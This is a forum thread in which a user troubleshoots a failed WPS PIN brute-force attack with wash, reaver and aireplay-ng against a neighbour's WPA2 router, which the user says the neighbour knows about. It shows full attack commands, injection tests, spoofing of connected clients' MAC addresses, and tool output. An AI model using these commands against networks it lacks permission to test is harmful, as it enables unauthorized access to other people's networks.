Results 1 to 3 of 3

Thread: Strange Wash/Reaver problem

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1
    Join Date
    2013-Aug
    Posts
    2

    Strange Wash/Reaver problem

    I have successfully cracked a WPA2 network at work using reaver, of course in order to see if it is locked I had to check it with wash, I was able to do this only after mkdir /etc/reaver/.

    However, when I'm trying to breach my neighbour (who's aware of this) this is the result of wash.

    Code:
    root@kali:~# wash -i mon0 -C
    
    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    --------------------------------------------------------------------------------------------------------------
    And the result of airodump-ng mon0 -c 1

    Code:
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                        
     00:12:xx:xx:xx:xx  -51 100       86        0    0   1  54e. WPA2 CCMP   PSK  xxxxxxxxx

    Standard Reaver command results in "switching mon0 to channel1" which lasts forever.
    Code:
    root@kali:~# reaver -i mon0 -b xx;xx:xx:xx:xx:xx -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    
    [+] Waiting for beacon from xx:xx:xx:xx:xx:xx
    [+] Switching mon0 to channel 1
    Then I'm going more hardcore with -L and -A and I get to another infinite loop:

    Code:
    root@kali:~# reaver -i mon0 -b xx;xx:xx:xx:xx:xx -vv -L -A 
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    
    [+] Waiting for beacon from xx:xx:xx;xx:xx:xx
    [+] Switching mon0 to channel 1
    [+] Associated with xx:xx;xx;xx:xx (ESSID: xxxxxxxxxxxxxx)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    I've tested tons of variations, still nothing.

    Aireplay-ng -9 mon0 results:

    Code:
    root@kali:~# aireplay-ng -9 mon0
    10:49:41  Trying broadcast probe requests...
    10:49:41  Injection is working!
    10:49:42  Found 1 AP
    
    10:49:42  Trying directed probe requests...
    10:49:42  00:xx:xx:xx:xx:xx - channel: 1 - 'xxxxxxxxx'
    10:49:43  Ping (min/avg/max): 1.553ms/9.367ms/124.480ms Power: -72.50
    10:49:43  30/30: 100%

    Aireplay injection test
    aireplay-ng -9 -e xxxxxx -a 00:xx:xx:xx:xx:xx -i wlan1 wlan0

    Code:
    root@kali:~# aireplay-ng -9 -e xxxxxxxxxxxx -a 0x:xx:xx:xx:xx:xx -i wlan1 wlan0
    
    10:55:01  Waiting for beacon frame (BSSID: 00:xx:xx:xx:xx:xx) on channel 1
    10:55:01  Trying broadcast probe requests...
    10:55:01  Injection is working!
    10:55:03  Found 1 AP 
    
    10:55:03  Trying directed probe requests...
    10:55:03  xx:xx:xx;xx:xx:xx - channel: 1 - 'xxxxxxxxx'
    10:55:03  Ping (min/avg/max): 1.134ms/8.493ms/73.599ms Power: -39.57
    10:55:03  30/30: 100%
    
    
    10:55:03  Trying card-to-card injection...
    10:55:03  Attack -0:           OK
    10:55:03  Attack -1 (open):    OK
    10:55:03  Attack -1 (psk):     OK
    10:55:03  Attack -2/-3/-4/-6:  OK
    10:55:03  Attack -5/-7:        OK
    And I can't do anything about it...

    I'm using 2 wireless cards, Atheros AR9285 and Atheros AR9271.

    airmon-ng check kill doesn't help either.
    Spoofing card's mac(I've got the mac of 2 PCs which are connected to this network, tried to reaver it when they were disconnected) on both wlan0/mon0 and wlan1 and adding --mac=spoofedmac in reaver doesn't give me anything new.

    I have also tried to update
    apt-get install libcap-dev
    apt-get install libsqlite3-dev

    Any suggestions?

  2. #2
    Join Date
    2013-Mar
    Posts
    15
    Hello ald4,
    Honestly I do not understand why the Wash Bug is still around.
    I had the same problem yesterday.
    To solve it, just create a folder "reaver" into /etc/ (mkdir /etc/reaver).

    In regards to Reaver I also had some "problems", but I have to take a closer look before commenting on that.

    Best regards,

  3. #3
    Join Date
    2013-Aug
    Posts
    2
    Thank you Tirn,

    As stated in the first paragraph, I've already created a reaver folder. Still can't find any solution...

    Tried today more reaver variations, even another wireless card. Still nothing. WPS is disabled for sure.
    Last edited by ald4; 2013-08-05 at 20:07.

Similar Threads

  1. Running wash in background during a reaver attack
    By mmusket33 in forum General Archive
    Replies: 0
    Last Post: 2014-05-17, 02:18
  2. Differences in WPS Status between Reaver and Wash.
    By mmusket33 in forum General Archive
    Replies: 0
    Last Post: 2014-04-09, 10:31
  3. Wash and Reaver doesn't work..
    By phasma in forum TroubleShooting Archive
    Replies: 1
    Last Post: 2013-08-19, 09:02

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •